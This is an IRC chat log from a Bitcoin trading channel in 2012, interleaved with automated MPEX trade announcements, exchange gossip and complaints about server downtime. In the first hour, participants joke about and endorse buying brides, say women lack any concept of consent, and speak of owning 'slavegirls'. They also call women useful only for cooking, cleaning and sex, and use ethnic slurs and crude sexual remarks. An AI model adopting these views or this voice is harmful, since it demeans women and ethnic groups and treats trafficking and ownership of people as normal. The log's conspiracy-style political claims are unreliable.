03:30:17 http://boingboing.net/2012/11/13/buy-a-wife-from-vietnam-for-6.html Nov 14 03:45:32 lol Nov 14 03:45:51 if you have to pay you are doing it wrong... Nov 14 03:46:21 girls there will pay you to marry them, i bet the "match maker" is taking 6000$ from both sides, lol Nov 14 03:47:50 Chaang-Noi: you know Nov 14 03:48:08 Im surprised there isnt jew/asian-style matchmaking prevelent in the US Nov 14 03:48:35 [MPEX] [S.MPOE] 27685 @ 0.00050023 = 13.8489 BTC [+] Nov 14 03:48:36 [MPEX] [S.MPOE] 16100 @ 0.00050025 = 8.054 BTC [+] Nov 14 03:48:38 [MPEX] [S.MPOE] 16109 @ 0.00050121 = 8.074 BTC [+] Nov 14 03:48:38 [MPEX] [S.MPOE] 40700 @ 0.00050136 = 20.4054 BTC [+] Nov 14 03:48:39 [MPEX] [S.MPOE] 38550 @ 0.00050147 = 19.3317 BTC [+] Nov 14 03:48:40 [MPEX] [S.MPOE] 46100 @ 0.00050187 = 23.1362 BTC [+] Nov 14 03:48:42 [MPEX] [S.MPOE] 34850 @ 0.00050252 = 17.5128 BTC [+] Nov 14 03:48:43 [MPEX] [S.MPOE] 11080 @ 0.00050254 = 5.5681 BTC [+] Nov 14 03:48:44 [MPEX] [S.MPOE] 51924 @ 0.00050355 = 26.1463 BTC [+] Nov 14 03:48:45 [MPEX] [S.MPOE] 17907 @ 0.00050381 = 9.0217 BTC [+] Nov 14 03:48:46 [MPEX] [S.MPOE] 12495 @ 0.00050496 = 6.3095 BTC [+] Nov 14 03:48:56 $6000 is high, in thailand thats way to much Nov 14 03:49:22 i wonder how long till the first glbse bride buying company Nov 14 03:49:23 people in the west think of this as human trafficing but its normal part of the culture Nov 14 03:49:25 o wait. no more glbse. Nov 14 03:49:37 glbse is coming back in a legal verson :) Nov 14 03:50:17 Chaaang-Noi: yeah, its not human trafficing if the women consent Nov 14 03:50:21 its just weird Nov 14 03:50:40 well... conset is not really a concept women have over here... Nov 14 03:50:53 they do what they are told by father/husband... Nov 14 03:51:10 much more natural. Nov 14 03:51:37 [MPEX] [S.MPOE] 8005 @ 0.00050496 = 4.0422 BTC [+] Nov 14 03:51:39 [MPEX] [S.MPOE] 54058 @ 0.00050517 = 27.3085 BTC [+] Nov 14 03:51:39 [MPEX] [S.MPOE] 26283 @ 0.0005074 = 13.336 BTC [+] Nov 14 03:51:40 [MPEX] [S.MPOE] 12550 @ 0.00050764 = 6.3709 BTC [+] Nov 14 03:51:41 [MPEX] [S.MPOE] 69800 @ 0.00050773 = 35.4396 BTC [+] Nov 14 03:51:43 [MPEX] [S.MPOE] 25100 @ 0.00050829 = 12.7581 BTC [+] Nov 14 03:51:44 [MPEX] [S.MPOE] 18304 @ 0.00050831 = 9.3041 BTC [+] Nov 14 03:51:45 mircea_popescu: I mean they havent been picked up off the street and stored in cages Nov 14 03:51:45 [MPEX] [S.MPOE] 12400 @ 0.00050866 = 6.3074 BTC [+] Nov 14 03:51:47 in norhtern thailand for a group of people they sell their daughters into marrage for 40,000 baht as a high average, thats about $1,300 usd Nov 14 03:52:01 Diablo-D3 you're thinking Austria. Nov 14 03:52:23 lol that guy... Nov 14 03:52:34 built is own sex dungan... Nov 14 03:53:55 yeah really, I dont get the point of a sex dungeon Nov 14 03:53:58 waht does a romanian virgin go for mircea or is there not a market anymore? Nov 14 03:54:03 I mean, if you're into kinky shit, thats fine Nov 14 03:54:22 but why keep her tied up when you can just have her prance around the house naked Nov 14 03:55:24 Chaaang-Noi there's no more virgins. Nov 14 03:55:40 fucked before birth eh? Nov 14 03:55:50 Diablo-D3 why not ? a little alone time always halps. Nov 14 03:56:18 moo Nov 14 03:56:22 i saw a jap cartoon comic once where a baby was fucked before birth... japs are twisted... Nov 14 03:56:42 hey copumpkin, its almost pumkin pie time, you gots to hide? Nov 14 03:56:52 mircea_popescu: I meant between erections. Nov 14 03:56:54 I survived halloween Nov 14 03:57:01 those trying to carve me did not Nov 14 03:57:05 since, clearly, women are only useful for cooking, cleaning, and sex. Nov 14 03:57:22 get out, my slavegirls make better conversation partners than most of you. Nov 14 03:57:29 D3 they are good for watching offspring... Nov 14 03:57:36 they also play bridge and poker, and do other fun stuff. Nov 14 03:57:49 slave girls can do fun stuff? :) Nov 14 03:57:56 they can shoot, for one. Nov 14 03:57:59 tell me more! lol Nov 14 03:58:02 also, drive... Nov 14 03:58:05 they ride upside-down on the front of his car, like gord Nov 14 03:58:09 with a ball-gag Nov 14 03:58:29 lol Nov 14 03:58:32 can they pull a cart? :) Nov 14 03:58:34 copumpkin: hey, it takes skills to hang off the front of a car using nothing but their pussy and the hood ordiment Nov 14 03:58:35 they still can't cook better than me tho Nov 14 03:58:43 ordiment lol Nov 14 03:58:58 http://alterpic.files.wordpress.com/2010/03/invertedtruck-143.jpg Nov 14 03:59:06 no ball-gag there Nov 14 03:59:10 Chaaang-Noi yes, they can. http://trilema.com/2010/test-de-cultura-vizuala-8/ Nov 14 03:59:27 mircea_popescu: seriously though, you dont have slavegirls, you have multiple wives Nov 14 03:59:33 why ? Nov 14 04:00:02 because they probably could kill you at any point they wished. Nov 14 04:00:37 i have myself been woried of an uprising... Nov 14 04:00:42 what sort of retarded argument is that lmao. Nov 14 04:00:49 just make it so you are worth more to them alive than dead :) Nov 14 04:01:08 mircea_popescu: what, you dont think slaves have ever beaten their masters? Nov 14 04:01:19 * 15 minutes later, mircea is locked up in his own dungeon * Nov 14 04:01:20 how's the general relevant ? Nov 14 04:01:32 mircea_popescu: do you accept slave applications? I need a master Nov 14 04:01:37 I've been a very bad boy Nov 14 04:01:40 haha, there's much you don't know about obedience young grasshobbler. Nov 14 04:01:47 copumpkin i don't do bois. Nov 14 04:01:48 oh, I know Nov 14 04:01:51 copumpin wtf is gord doing... i mean why is gord doing that... how can that be a fetish? Nov 14 04:01:52 I want to learn though Nov 14 04:01:53 oh :( Nov 14 04:02:05 Chaaang-Noi: search for "house of gord" and see all the other good stuff he does Nov 14 04:02:11 and they pay him to do that, I think Nov 14 04:02:15 or something Nov 14 04:02:16 it's GOURD you know! Nov 14 04:02:24 oh shit, mircea_popescu knows my secret Nov 14 04:02:29 he must be silenced Nov 14 04:02:39 mircea_popescu: seriously though, chicks who are into that are into that because they're into that Nov 14 04:02:42 Chaaang-Noi: he has a pretty sweet chariot made from a couple of women Nov 14 04:02:43 nothing more, nothing less Nov 14 04:02:53 yeah i saw that chariot thing... Nov 14 04:03:12 Diablo-D3 right... so ? Nov 14 04:03:30 mircea_popescu: well, you make it sound like you're some sort of king of a nation here Nov 14 04:03:47 wasn't aware i was. no, not really. just a few womenz. Nov 14 04:04:02 'just a few" Nov 14 04:04:20 d3 its not that hard to set up in some part of the world Nov 14 04:04:32 having a few girls is not odd at all in thailand... Nov 14 04:04:36 im not sure what the part of the world has to do with anything. Nov 14 04:04:43 there's a new invention now called the interwebs Nov 14 04:04:43 Chaaang-Noi: I dont see the point, really Nov 14 04:04:46 sorta like a truck. Nov 14 04:05:01 no, its like a bunch of boobs, er, tubes! Nov 14 04:05:08 Diablo-D3 if you're much smarter than people in general you get to pick some people to own. it's really that simple. Nov 14 04:05:12 if you don't want to, you don't have to. Nov 14 04:05:24 i think it would be more difficult to get the average american girl to do the same as the average thai girl... Nov 14 04:05:35 hell in the usa you cant buy a girl for $2000... Nov 14 04:05:45 yeah, american girls think they rule the house Nov 14 04:05:45 i still don't understand why'd you pay. Nov 14 04:06:00 jewish women? yes. asian women? yes. american women? hell no. Nov 14 04:06:02 Diablo-D3 : i certainly has moar mericanz than azns Nov 14 04:06:03 in thailand the girls grow up expecting to be sold one day... Nov 14 04:06:20 as per usual, stereotypes be wrong. Nov 14 04:06:40 Chaaang-Noi: so how hard would it be to cause a revolution in thailand? Nov 14 04:06:54 didn't thailand have a king ? Nov 14 04:06:56 revolution? to accomplish what goal? Nov 14 04:07:05 Thailand has a King and a very very strong Army... Nov 14 04:07:12 Chaaang-Noi: all the women become mine. Nov 14 04:07:23 haha his name is Bhumibol Nov 14 04:07:30 just save some cash D3 and you can have more than you need/want Nov 14 04:07:42 can I buy them with bitcoins? Nov 14 04:07:48 .... Nov 14 04:07:49 huh. Nov 14 04:08:00 fuck, why is glbse down :< Nov 14 04:08:03 His personal wealth is tremendous: Forbes estimated Bhumibol's personal fortune, including property managed by the Crown Property Bureau which is considered national property,[9] to be US$30 billion in 2010 Nov 14 04:08:18 i guess you need 31 bn. Nov 14 04:08:21 $30b and most of it isnt his? Nov 14 04:08:26 bwhaha what a loser Nov 14 04:08:47 i think its more than 30 billion Nov 14 04:09:10 anyhow Nov 14 04:09:35 all I want is a woman who can cook, clean, is good in bed, is intelligent, and actually understands what a marriage is Nov 14 04:10:00 Im not particularly sure what the hell happened in america that women actively try to destroy their own marriages Nov 14 04:10:30 once you go asian you wont go back... Nov 14 04:10:35 Diablo-D3 well, the good ones left long ago. Nov 14 04:10:39 they are the win... Nov 14 04:11:05 Chaaang-Noi: yeah, but asians have that problem with small breasts Nov 14 04:12:41 and small cunts and small statures and etc. Nov 14 04:14:31 I like tits. Nov 14 04:14:47 < Diablo-D3> all I want is a woman who can cook, clean, is good in bed, is intelligent, and actually understands what a marriage is <<< stay away from my wife u Nov 14 04:14:59 hahaha Nov 14 04:15:20 stupid women are never good in bed anyway. Nov 14 04:15:30 you can pretty much use the later as a test. Nov 14 04:15:30 mircea_popescu: but thats all there seems to be Nov 14 04:15:41 like, Im not going to be one of these assholes who claim all american women are femnazis Nov 14 04:15:45 because its not true Nov 14 04:15:55 they just have a very strange view of what a relationship is Nov 14 04:16:49 [MPEX] [S.MPOE] 23727 @ 0.00049638 = 11.7776 BTC [-] Nov 14 04:16:50 [MPEX] [S.MPOE] 4623 @ 0.00049629 = 2.2943 BTC [-] Nov 14 04:17:22 like, they marry a guy, the guy isnt cheating on her, works his ass off every day for a shitty wage, etc etc Nov 14 04:17:32 and then she divorces him for cheating. Nov 14 04:17:56 and then it comes out that she was cheating on him, but still gets to steal his house, car, kids, etc, and gets him fired from his job Nov 14 04:19:07 this is from a country that married couples are supposed to be equal partners Nov 14 04:20:38 i lolled my ass of at the entire petraeus thing Nov 14 04:21:31 yeah, that was retarded Nov 14 04:23:22 it's like... the most pathetic affair ever to begin with. Nov 14 04:23:39 "ooo, they read draft emails by logging into the same acct" Nov 14 04:23:49 Im not even sure if its even an affair Nov 14 04:24:01 did either of them have sex with each other? nope. so wheres the affair? Nov 14 04:24:33 I think this was some sort of operation by the pentagon or white house to get rid of petraeus for some other reason Nov 14 04:26:00 like they got rid of all the rest of the top of the military Nov 14 04:26:46 well, it wont matter come dec 21st anyhow Nov 14 04:26:51 being the "second most influential American conservative" prolly didn't help Nov 14 04:31:04 d3 yeah most have small tits but not all, you can also fix that... but with small tits they have other things that are small :) Nov 14 04:31:27 Chaaang-Noi: fixing it usually isnt worth it Nov 14 04:31:30 Im not a fan of breast implants Nov 14 04:31:36 I prefer 100% organic women Nov 14 04:31:36 im not either Nov 14 04:32:00 i like the firmness more than size so im fine with asians... Nov 14 04:32:38 mircea the petraeus thing im sure is just a cover up for him fucking up so bad in libiya... Nov 14 04:32:43 heh Nov 14 04:32:48 organix Nov 14 04:32:51 libya Nov 14 04:33:18 maybe. tho the us has absolutely no competent intel people Nov 14 04:33:27 ditching the few barely competent doesn't seem like much of a plan. Nov 14 04:33:31 he let the ambasador get killed... no one would respect him Nov 14 04:33:31 he had to leave and they cant say cuz he is incompitent... Nov 14 04:33:33 so they say he fucked around... Nov 14 04:33:44 actually, at the current rate the afghani secret service is prolly owning us ss Nov 14 04:34:00 war is pointless anyhow Nov 14 04:34:05 it uses up precious resources that we cant afford to spend Nov 14 04:34:10 i think on average the cia and others do a very good job Nov 14 04:34:23 after all we got rid of kadafii :) Nov 14 04:34:34 Chaaang-Noi: actually Nov 14 04:34:36 his own people did Nov 14 04:34:37 you gotta be kidding. Nov 14 04:34:43 we tried to take credit for the uprising Nov 14 04:34:50 thirty years ago the us sucked, but at least it was part of the 2nd echelon Nov 14 04:34:57 all we did was provide a much needed eye in the sky, we had no action on the ground Nov 14 04:34:58 today it's like... nowhere to be seen Nov 14 04:35:00 his own people? you know the ambasador was there trying to get back the arms we give "his people" Nov 14 04:35:22 Chaaang-Noi: you mean the arms the russian sold to them in the 80s and 90s Nov 14 04:35:42 oh d3, you dont seem well informed on this isue... Nov 14 04:35:44 issue Nov 14 04:35:46 russia has been trying to overthrow quadaffi for years because he was just a puppet for the US Nov 14 04:35:54 lol Nov 14 04:36:06 thats why he bombed wester airliners and discos? Nov 14 04:36:08 uh Nov 14 04:36:22 well.. he did offer to buy condolezza rice on the cheap... Nov 14 04:36:39 lol damaged goods Nov 14 04:41:56 [MPEX] [S.MPOE] 28477 @ 0.00049629 = 14.1329 BTC [-] Nov 14 04:41:57 [MPEX] [S.MPOE] 7105 @ 0.00049616 = 3.5252 BTC [-] Nov 14 04:44:49 [MPEX] [S.MPOE] 26500 @ 0.0004983 = 13.205 BTC [+] Nov 14 04:47:08 Who's that Joel Katz anyway? Nov 14 04:48:07 afaik some computer geek. Nov 14 04:48:13 http://www.encyclopediabitcoinica.com/wiki/Wikipedia Nov 14 04:48:53 Well, maybe you could tell me what you think of the latest development, MP Nov 14 04:49:14 link me ? Nov 14 04:49:40 smickles lol Nov 14 04:49:59 https://bitcointalk.org/index.php?topic=121915.msg1333809#msg1333809 Nov 14 04:50:21 :) Nov 14 04:51:09 I'm challenging that people who deposit were investing at all in Patrick's business, because the profits (difference between deposit rate/loan rate) are not shared, and neither should losses. Nov 14 04:51:28 he seems to be just repeating the same thing. Nov 14 04:51:33 what was the count, 40something times. Nov 14 04:51:56 i don't see how his stuff can be taken seriously. Nov 14 04:52:38 Well everyone is free to have their opinion. I just find that for his statement of: Nov 14 04:52:44 "I did. I argued that this case is different because both Patrick and those who invested with him made precisely the same mistake." Nov 14 04:53:33 He does not argue much about why it is their common mistake other than they're coinvesting in the same business. Nov 14 04:53:40 ya well. he keeps saying that. it doesn't seem to mean anything in particular tho. Nov 14 04:53:52 lol. did you actually read the whole thread ? Nov 14 04:54:19 Most of it. I had been following it. Nov 14 04:54:45 "I did. I argued that this case is different because both Patrick and those who invested with him made precisely the same mistake." could almost be considered equivalent to Nov 14 04:54:58 "I did. I argued that this case is different because this case is different." Nov 14 04:55:06 ya, what can i tell you. Nov 14 04:55:13 "everyone knows/knew" etc. Nov 14 04:55:27 "drinking water is impossible" Nov 14 04:55:30 he has a list. Nov 14 04:56:04 anyway, i'm for bed. tty laters. Nov 14 04:56:06 His actual motive however seems to convince people to stop giving their funds to everyone coming to the forum requesting so and guaranteeing any kind of interest. Nov 14 04:56:23 Pretty much blaming them for doing it and being conned. Nov 14 04:56:25 i seriously doubt that. Nov 14 04:56:36 It's the feeling I get. Nov 14 04:56:59 his motive is trying to project some importance he doesn't have, and protect his buddy. Nov 14 04:57:04 but anyway. tomorro is another day. **** BEGIN LOGGING AT Wed Nov 14 13:01:32 2012 Nov 14 13:03:40 Chaaang-Noi: yeah, some guy keeps doing negative bitcoin posts on /g/ Nov 14 13:03:43 which is pretty smart Nov 14 13:03:52 it keeps people thinking about bitcoin Nov 14 13:03:56 and innoculates them against fucktards Nov 14 13:04:06 thai people cant post on /g/ i used to post there... Nov 14 13:04:18 heh Nov 14 13:04:23 what's /g/ Nov 14 13:04:31 mircea_popescu: technology Nov 14 13:04:35 Chaaang-Noi> http://boards.4chan.org/g/res/29064123 Nov 14 13:04:42 you joined just after i linked Nov 14 13:04:45 the only thing nerds will ever have in common with the g spot Nov 14 13:04:48 is /g/ Nov 14 13:04:56 I think thats the joke Nov 14 13:05:00 no such thing as g spot, lulz Nov 14 13:05:16 Chaaang-Noi, you nerd. Nov 14 13:05:23 lol Chaaang-Noi is a virgin Nov 14 13:05:31 >try to purchase buttcoin from notorious buttcoin market Nov 14 13:05:31 >next day bank phone me Nov 14 13:05:31 >tells me I'm being scanned Nov 14 13:05:31 >they blocked my money Nov 14 13:05:31 That concludes my experience with bitcoin. Nov 14 13:05:34 i never claimed to not be a nerd, however virgin is lulz Nov 14 13:05:35 this sounds pretty much like it. Nov 14 13:05:45 sheepsies will be kept out of it for a long, long time simply by this. Nov 14 13:06:03 kinda why i think all the attempts to get bitcoin interestying to the consumer/retail markets are dumb. Nov 14 13:06:18 i had a bad experiance with gox... if it was my first experiance with btc id never come back Nov 14 13:06:18 well, notice he doesnt say which bank or which exchange Nov 14 13:06:21 so hes just a troll Nov 14 13:06:22 gox is so bad for btc... Nov 14 13:06:23 you work your ass off to make buttcoin friday, the banks just piss on you with one line of code. Nov 14 13:06:25 bye. Nov 14 13:06:42 Diablo-D3 he's no troll. it's just that's ALL banks and ALL exchanges. Nov 14 13:06:51 is bitcoin friday every friday or just that once? Nov 14 13:06:51 for the average consumer. Nov 14 13:06:53 my bank has never had problems Nov 14 13:07:06 ya but you're possibly not the random idiot who picked a random bank Nov 14 13:07:28 no, I use HSBC. Nov 14 13:07:33 mt gox demanded so much shit from me after they froze my account... Nov 14 13:07:35 one of the largest banks in the world. Nov 14 13:07:44 called me a terrorist... Nov 14 13:07:51 Chaaang-Noi: they didnt. Nov 14 13:07:52 the US government did. Nov 14 13:08:10 and technically they called you a druglord, not a terrorist Nov 14 13:08:15 nope, he said he had proof i was a "terrorest or a money launder" and he quoted japanese law Nov 14 13:08:28 Chaaang-Noi: I really doubt he said that Nov 14 13:08:35 he used the word terrorist on the forum Nov 14 13:08:38 lmao Nov 14 13:08:41 well, you're a goat. Nov 14 13:08:48 they strap bombs to goats and shit Nov 14 13:08:48 im not kidding Nov 14 13:09:05 on the forum he said he had "proof" of me being a "terrorist or a money launder" Nov 14 13:09:06 why waste women when you can blow up goats instead Nov 14 13:09:08 or camels Nov 14 13:09:13 or empty tents Nov 14 13:09:20 it was mark Nov 14 13:09:54 after sending shit like marrage certifiacate and having my lawyer contact them to tell them i was going to sue theuir ass they gave me the money back Nov 14 13:10:03 fucking mt gox Nov 14 13:10:35 i never used them. Nov 14 13:10:56 dont, its not worth it Nov 14 13:11:33 early on i was like tux, link mpoe on your site Nov 14 13:11:36 he was like blablabla Nov 14 13:11:39 i was like.... -.- Nov 14 13:11:51 I used mtgox before magicaltux got it Nov 14 13:12:07 Ive never had problems with them Nov 14 13:14:59 i guess people just don't grasp how this works. had about the same exchange with the weusecoins dood Nov 14 13:15:04 i was hey, link mpex Nov 14 13:15:11 he was like send us id!! Nov 14 13:15:30 mircea_popescu: well, if Im trying to run a legit site Nov 14 13:15:32 i'm like... so fuck you, in case one day you ask something of me i'ma make you send me shoe on your wife's tits pics. Nov 14 13:15:32 I link to no one. Nov 14 13:15:34 period. Nov 14 13:15:41 weusecoins exists to link to people. Nov 14 13:15:43 afaik Nov 14 13:16:13 ahh Nov 14 13:16:20 so wtf is his problem Nov 14 13:16:53 that's the problem with btc, a buncha doofuses think they're hot shit. Nov 14 13:17:04 nefario, that other idiot on welfare, theymos, pretty much all of them Nov 14 13:17:08 like intersango guys? Nov 14 13:17:14 yeah theymos Nov 14 13:17:17 some random joes off the street, never saw money toghether, never ran a business Nov 14 13:17:29 somehow they think through the magical power of buttcoin they suddenly became important in the world Nov 14 13:17:37 except... they're not. Nov 14 13:17:38 yeah, its sad Nov 14 13:17:43 nor will they be, at this rate. Nov 14 13:18:51 iv lost some faith in btc once i saw who the "leaders" where Nov 14 13:18:52 mircea_popescu: yeah, I hate people like that Nov 14 13:18:56 they ruined bitcoin imo Nov 14 13:19:03 I liked what it was when I started Nov 14 13:19:07 it's like, dood, you're a twenty something student guy ? stfu and serve. Nov 14 13:19:10 a bunch of people who wanted to make the world better Nov 14 13:19:15 ruined it my ass. Nov 14 13:19:18 now its just a bunch of scamartists Nov 14 13:19:30 bitcoin can't be ruined is the thing. Nov 14 13:19:39 no, but the community can be toxic Nov 14 13:19:47 what they're trying to do is practically speaking whale riding. sure, it'll work for five minutes Nov 14 13:19:50 then you get killed. Nov 14 13:19:56 [MPEX] [S.MPOE] 9622 @ 0.00050157 = 4.8261 BTC [-] Nov 14 13:19:57 [MPEX] [S.MPOE] 13528 @ 0.00050087 = 6.7758 BTC [-] Nov 14 13:23:55 and then you have the other sort of idiot : https://bitcointalk.org/index.php?topic=123849.0 Nov 14 13:24:09 you fuck up. someone points it out. what do you do ? Nov 14 13:24:16 either ignore it or claim they're "spreading fud" Nov 14 13:24:32 i clearly fucking remember nefario in this very channel saying "o it's not true" TO THE EXACT THING Nov 14 13:24:40 that closed him down three weeks later. Nov 14 13:24:45 it's like... pfff. Nov 14 13:40:35 mircea_popescu: I still think the shit with DMC was just a delay tactic Nov 14 13:45:48 [MPEX] [S.MPOE] 29598 @ 0.00050087 = 14.8248 BTC [-] Nov 14 13:45:50 [MPEX] [S.MPOE] 2202 @ 0.00050072 = 1.1026 BTC [-] Nov 14 14:11:21 [MPEX] [S.MPOE] 6864 @ 0.00050282 = 3.4514 BTC [+] Nov 14 14:36:38 [MPEX] [S.MPOE] 19516 @ 0.00050072 = 9.7721 BTC [-] Nov 14 15:01:39 [MPEX] [S.MPOE] 3949 @ 0.00050072 = 1.9773 BTC [-] Nov 14 15:01:40 [MPEX] [S.MPOE] 32601 @ 0.00049957 = 16.2865 BTC [-] Nov 14 15:24:41 Diablo-D3: probably not but it gave James a good idea hwo to drop this pile of shit he was sitting on and pocket few coins while divorcing from this project for good Nov 14 15:26:45 [MPEX] [S.MPOE] 9230 @ 0.00049957 = 4.611 BTC [-] Nov 14 15:26:46 [MPEX] [S.MPOE] 5216 @ 0.00049857 = 2.6005 BTC [-] Nov 14 15:28:29 Diablo-D3: no matter ow many times you are attempting to make it look/sound like that someone else fucked up your DMC (oops, not yours, you sold it to investors) we all know that the all the ridiculously stupid investment decisions where made by you :) Nov 14 15:29:28 EskimoBob: the only stupid investment decision I made was thinking nefario wasnt a scammer Nov 14 15:40:45 http://stackoverflow.com/questions/13375357/android-usermanager-isuseragoat Nov 14 15:41:23 apparently android supports Chaang-Noi now Nov 14 15:43:55 :) Nov 14 15:46:43 http://xkcd.com/1134/ Nov 14 15:52:34 [MPEX] [S.MPOE] 16420 @ 0.00050282 = 8.2563 BTC [+] Nov 14 15:54:06 http://www.telegraph.co.uk/news/picturegalleries/picturesoftheday/9051352/Pictures-of-the-day-31-January-2012.html?image=3 Nov 14 15:54:21 Meet the surfing goat ... Nov 14 16:03:31 heh Nov 14 16:09:19 i should buy a real goat... Nov 14 16:13:06 not that shit again .... http://exchange.zapto.org/node/12 Nov 14 16:13:33 I have no coin there but I guess some people do Nov 14 16:16:09 ....... Nov 14 16:16:54 probably nothing but stuff like that just smells really bad, like GLBSE Nov 14 16:18:21 [MPEX] [S.MPOE] 25016 @ 0.00050282 = 12.5785 BTC [+] Nov 14 16:18:23 [MPEX] [S.MPOE] 23334 @ 0.00050496 = 11.7827 BTC [+] Nov 14 16:43:29 [MPEX] [S.MPOE] 6915 @ 0.00050496 = 3.4918 BTC [+] Nov 14 16:43:31 [MPEX] [S.MPOE] 7335 @ 0.00050522 = 3.7058 BTC [+] Nov 14 17:09:31 [MPEX] [S.MPOE] 38012 @ 0.00049857 = 18.9516 BTC [-] Nov 14 17:36:15 [MPEX] [S.MPOE] 64 @ 0.00049857 = 0.0319 BTC [-] Nov 14 17:36:17 [MPEX] [S.MPOE] 34976 @ 0.00049853 = 17.4366 BTC [-] Nov 14 17:36:18 [MPEX] [S.MPOE] 11831 @ 0.00049826 = 5.8949 BTC [-] Nov 14 18:01:23 [MPEX] [S.MPOE] 11069 @ 0.00049826 = 5.5152 BTC [-] Nov 14 18:01:25 [MPEX] [S.MPOE] 34700 @ 0.00049803 = 17.2816 BTC [-] Nov 14 18:01:26 [MPEX] [S.MPOE] 4031 @ 0.00049799 = 2.0074 BTC [-] Nov 14 18:27:46 [MPEX] [S.MPOE] 24100 @ 0.00049936 = 12.0346 BTC [+] Nov 14 18:53:14 [MPEX] [S.MPOE] 31716 @ 0.00050011 = 15.8615 BTC [+] Nov 14 19:18:35 [MPEX] [S.MPOE] 31065 @ 0.00050522 = 15.6947 BTC [+] Nov 14 19:18:36 [MPEX] [S.MPOE] 14435 @ 0.00050609 = 7.3054 BTC [+] Nov 14 19:25:04 jurov: why is coinbr down? Nov 14 19:43:40 [MPEX] [S.MPOE] 5384 @ 0.00050489 = 2.7183 BTC [-] Nov 14 19:43:41 [MPEX] [S.MPOE] 14554 @ 0.00049936 = 7.2677 BTC [-] Nov 14 19:43:43 [MPEX] [S.MPOE] 4700 @ 0.00049876 = 2.3442 BTC [-] Nov 14 19:58:46 I will pay you extra Jurov to have interns Nov 14 19:58:48 lol Nov 14 20:01:50 ugh Nov 14 20:02:07 and who da fuck keeps buying out all the options Nov 14 20:09:02 [MPEX] [S.MPOE] 20300 @ 0.00049799 = 10.1092 BTC [-] Nov 14 20:34:13 [MPEX] [S.MPOE] 23019 @ 0.00049799 = 11.4632 BTC [-] Nov 14 20:34:13 [MPEX] [S.MPOE] 21481 @ 0.0004979 = 10.6954 BTC [-] Nov 14 20:59:40 [MPEX] [S.MPOE] 11119 @ 0.0004979 = 5.5362 BTC [-] Nov 14 20:59:42 [MPEX] [S.MPOE] 30718 @ 0.00049789 = 15.2942 BTC [-] Nov 14 21:25:02 [MPEX] [S.MPOE] 15675 @ 0.00049789 = 7.8044 BTC [-] Nov 14 21:27:09 is this enough proof https://bitcointalk.org/index.php?topic=75802.msg1334847#msg1334847 Nov 14 21:50:27 [MPEX] [S.MPOE] 57 @ 0.00049789 = 0.0284 BTC [-] Nov 14 21:50:29 [MPEX] [S.MPOE] 28350 @ 0.00049731 = 14.0987 BTC [-] Nov 14 22:02:59 Diablo-D3: probably not but it gave James a good idea hwo to drop this pile of shit he was sitting on and pocket few coins while divorcing from this project for good <<< this may actually be true. Nov 14 22:03:11 one can certainly see a diablo > goat > total failure progression. Nov 14 22:04:19 lucidlepidoptera how's the virtual eatery business going ? Nov 14 22:15:44 [MPEX] [S.MPOE] 39155 @ 0.00049704 = 19.4616 BTC [-] Nov 14 22:28:28 mircea_popescu: were you insinuating btcpantry will fail? Nov 14 22:30:13 i was ? Nov 14 22:34:58 how is the options emporium doing? Nov 14 22:39:25 same old, same old. Nov 14 22:41:00 [MPEX] [S.MPOE] 23862 @ 0.00049804 = 11.8842 BTC [+] Nov 14 22:45:59 ... but I still believe that after he receives the flowers, he is going to pull through and make us all happy Nov 14 22:46:11 just for lulz happy Nov 14 22:47:39 i would like to see a documentary about how these idiots date. Nov 14 22:48:17 BTC-Mining i see you've started using different colors. i'm curious if that helps. Nov 14 23:06:01 [MPEX] [S.MPOE] 11785 @ 0.00049815 = 5.8707 BTC [+] Nov 14 23:06:02 [MPEX] [S.MPOE] 14395 @ 0.00049795 = 7.168 BTC [-] Nov 14 23:06:03 [MPEX] [S.MPOE] 23686 @ 0.00049697 = 11.7712 BTC [-] Nov 14 23:31:19 [MPEX] [S.MPOE] 15504 @ 0.00049697 = 7.705 BTC [-] Nov 14 23:31:21 [MPEX] [S.MPOE] 14996 @ 0.0004968 = 7.45 BTC [-] Nov 14 23:55:19 fuck. first day after a loong time i get to a wilderness trip without internat, and of course bitvps has to choose this day to fuck up. for 12 hours!!! Nov 14 23:55:27 *internet Nov 14 23:55:59 like rg is stalking me or what Nov 14 23:56:32 how's it fucked up ? Nov 14 23:57:08 coinbr.com was 12hrs inaccessible today Nov 14 23:57:27 i see it atm. Nov 14 23:57:39 [MPEX] [S.MPOE] 47400 @ 0.00049945 = 23.6739 BTC [+] Nov 14 23:57:48 yes, now i came up,all my hair rose, but everything is like nothing happened Nov 14 23:58:56 and there's no announcement on bitvps, nothing in the email (except fould cries "i cant connect" from backup routine) Nov 14 23:58:59 *foul Nov 15 00:00:41 from them I can see the problem was at least between 7am-7pm UTC Nov 15 00:01:09 and of course, inquiries of customers Nov 15 00:10:18 thestringpuller, you'll gonna pay me interns? Nov 15 00:22:59 [MPEX] [S.MPOE] 9450 @ 0.00050006 = 4.7256 BTC [+] Nov 15 00:32:53 haha better spitroast rg Nov 15 00:34:43 !ticker s.mpoe Nov 15 00:34:44 [MPEX:S.MPOE] 1day: 0.00049588 / 0.00050116 / 0.00050878 (2183612 shares, 1,094.34 BTC), 30day: 0.00040587 / 0.00046544 / 0.00051331 (61576875 shares, 28,660.40 BTC) Nov 15 00:37:42 just wrote flaming bitvps ticket, can finally shower Nov 15 00:38:51 pity that people dislike smoke smell from open fire... i'd keep wearing it like a perfume if i could Nov 15 00:46:56 lol what are you, beef jerky ? Nov 15 00:48:20 [MPEX] [S.MPOE] 10577 @ 0.00050418 = 5.3327 BTC [+] Nov 15 00:48:22 [MPEX] [S.MPOE] 2850 @ 0.00050113 = 1.4282 BTC [-] Nov 15 00:48:23 [MPEX] [S.MPOE] 14650 @ 0.00050056 = 7.3332 BTC [-] Nov 15 00:48:25 [MPEX] [S.MPOE] 23023 @ 0.00049945 = 11.4988 BTC [-] Nov 15 01:03:18 mmmm beef jerky Nov 15 01:04:05 must be a certain datacenter that went down, i'm connecting from bitvps and am still authed with gribble etc Nov 15 01:09:01 maybe i'm the only one who's hosting un europe... but anyway, they don't do any monitoring? and, 12 hours, srsly? Nov 15 01:13:58 [MPEX] [S.MPOE] 42100 @ 0.00050523 = 21.2702 BTC [+] Nov 15 01:13:58 are you sure it wasn't just dns issue ? Nov 15 01:13:58 [MPEX] [S.MPOE] 4300 @ 0.00050538 = 2.1731 BTC [+] Nov 15 01:14:06 i had some problems earlier Nov 15 01:18:15 how to get 70ish proof spirits Nov 15 01:18:29 1. buy vodka. 2. place in freezer. 3. some days later, the water content has frozen. Nov 15 01:23:54 mircea, both the backup and other things that disconnected use numeric IP, so no DNS problem there Nov 15 01:26:02 jurov is trying to talk down the S.BVPS 